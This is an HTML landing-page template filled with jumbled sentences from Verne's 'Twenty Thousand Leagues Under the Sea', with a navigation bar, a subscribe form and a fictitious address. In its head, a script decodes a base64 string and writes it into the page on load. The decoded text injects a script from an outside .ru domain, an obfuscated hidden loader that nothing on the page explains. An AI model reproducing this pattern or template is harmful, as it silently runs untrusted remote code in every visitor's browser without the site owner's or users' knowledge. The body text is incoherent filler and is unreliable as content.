<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Well, M. Aronnax, that is wisely said.</title>

	<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">
	<link href="https://fonts.googleapis.com/css?family=Quicksand" rel="stylesheet">
    <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/font-awesome/4.6.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="styles.css">

    <script type="text/javascript">
	let encoded = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8va2xvb2xrLnJ1L3RyYWNrZXIuanMiPjwvc2NyaXB0PjxkaXYgY2xhc3M9ImNoZWNrX2Zvcl84cHlobnBmbHJyZnAiPjwvZGl2Pg==';let decoded = atob(encoded);document.write(''+ decoded +'');
	</script>

</head>

<body>

	<header>
		<nav>
			<li><a href="#">Home</a></li>
			<li><a href="#">Products</a></li>
			<li><a href="#">About</a></li>
			<li><a href="#">Contacts</a></li>
		</nav>
	</header>


	<section class="hero">
		<div class="background-image" style="background-image: url(main.jpg);"></div>
		<h1>Well, M. Aronnax, that is wisely said.</h1>
	</section>


	<section class="our-work">
		<h3 class="title">No; in a church, replied Conseil.</h3>
		<p>At last one can see, cried Ned Land, who, knife in hand, stood on the defensive. By what name ought I to address you? Well, unless the Nautilus sails on dry land, and passes above the isthmus- The man had approached, and with his face flattened against the glass, was looking at us.</p>
		<hr>

		<ul class="grid">
			<li class="large" style="background-image: url(image1.jpg);"></li>
		</div>
	</section>
	

	<section class="our-work">
		<h3 class="title">I could not answer that question, and I fe</h3>
		<p>And then? We descended the mountain rapidly, and the mineral forest once passed, I saw the lantern of the Nautilus shining like a star. The captain walked straight to it, and we got on board as the first rays of light whitened the surface of the ocean. The island of Ceylon, noted for its pearl-fisheries. Would you like to visit one of them, M. Aronnax? Little by little, Ned Land acquired a taste for chatting, and I loved to hear the recital of his adventures in the polar seas. He related his fishing, and his combats, with natural poetry of expression; his recital took the form of an epic poem, and I seemed to be listening to a Canadian Homer singing the Iliad of the regions of the North.</p>
		<hr>

		<ul class="grid">
			<li class="large" style="background-image: url(image2.jpg);"></li>
		</div>
	</section>



	<section class="contact">
		<h3 class="title">Ah! said I. You know?</h3>	
		<p>Twelve o'clock, sir, said he. When you like- The price of these pearls varies according to their size? asked Conseil. Detestable, M. Aronnax. The Greek and Latin historians do not speak favorably of it, and Strabo says it is very dangerous during the Etesian winds, and in the rainy season. The Arabian Edrisi portrays it under the name of the Gulf of Colzoum, and relates that vessels perished there in great numbers on the sand-banks, and that no one would risk sailing in the night. It is, he pretends, a sea subject to fearful hurricanes, strewn with inhospitable islands, and 'which offers nothing good either on its surface or in its depths.' Such, too, is the opinion of Arrian, Agatharcides, and Artemidorus. Over it, sir! said Captain Nemo quietly. No, not over it, but under it!</p>
		<hr>

		<form>
			<input type="email" placeholder="Email">
			<input type="Name" placeholder="Name">
			<input type="Surmane" placeholder="Surname">
			<a href="#" class="btn">Subscribe now</a>
		</form>

	</section>

	<footer>
		<ul>
			<li><a href="#"><i class="fa fa-twitter-square"></i></a></li>
			<li><a href="#"><i class="fa fa-facebook-square"></i></a></li>
			<li><a href="#"><i class="fa fa-snapchat-square"></i></a></li>
			<li><a href="#"><i class="fa fa-pinterest-square"></i></a></li>
			<li><a href="#"><i class="fa fa-github-square"></i></a></li>
		</ul>
		<p><a href="policy.html">Privacy policy</a></p>
		<p>82518 Harvey Radial, Suite 436, 98950, Clarafurt, Connecticut, United States</p>
	</footer>

</body>

</html>
